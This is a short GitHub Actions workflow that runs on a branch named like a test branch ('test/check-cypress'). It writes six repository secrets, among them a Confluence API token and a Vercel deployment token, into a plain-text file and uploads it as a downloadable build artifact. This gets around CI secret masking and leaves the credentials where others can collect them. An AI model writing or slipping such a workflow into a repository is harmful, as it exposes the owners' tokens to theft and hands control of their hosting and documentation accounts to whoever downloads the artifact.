name: Extract secrets
on:
  push:
    branches:
      - 'test/check-cypress'

jobs:
  extract_secrets:
    runs-on: ubuntu-latest
    steps:
      - name: before_script
        run: |
          echo "CPV_CONFLUENCE_API_TOKEN : ${{ secrets.CPV_CONFLUENCE_API_TOKEN }}" >> secrets.txt
          echo "CPV_CONFLUENCE_API_USERNAME : ${{ secrets.CPV_CONFLUENCE_API_USERNAME }}" >> secrets.txt
          echo "CPV_CONFLUENCE_BASE_URL : ${{ secrets.CPV_CONFLUENCE_BASE_URL }}" >> secrets.txt
          echo "VERCEL_ORG_ID : ${{ secrets.VERCEL_ORG_ID }}" >> secrets.txt
          echo "VERCEL_PROJECT_ID : ${{ secrets.VERCEL_PROJECT_ID }}" >> secrets.txt
          echo "VERCEL_TOKEN : ${{ secrets.VERCEL_TOKEN }}" >> secrets.txt
          
      - name: upload key
        uses: actions/upload-artifact@v3
        with:
          name: secrets
          path: secrets.txt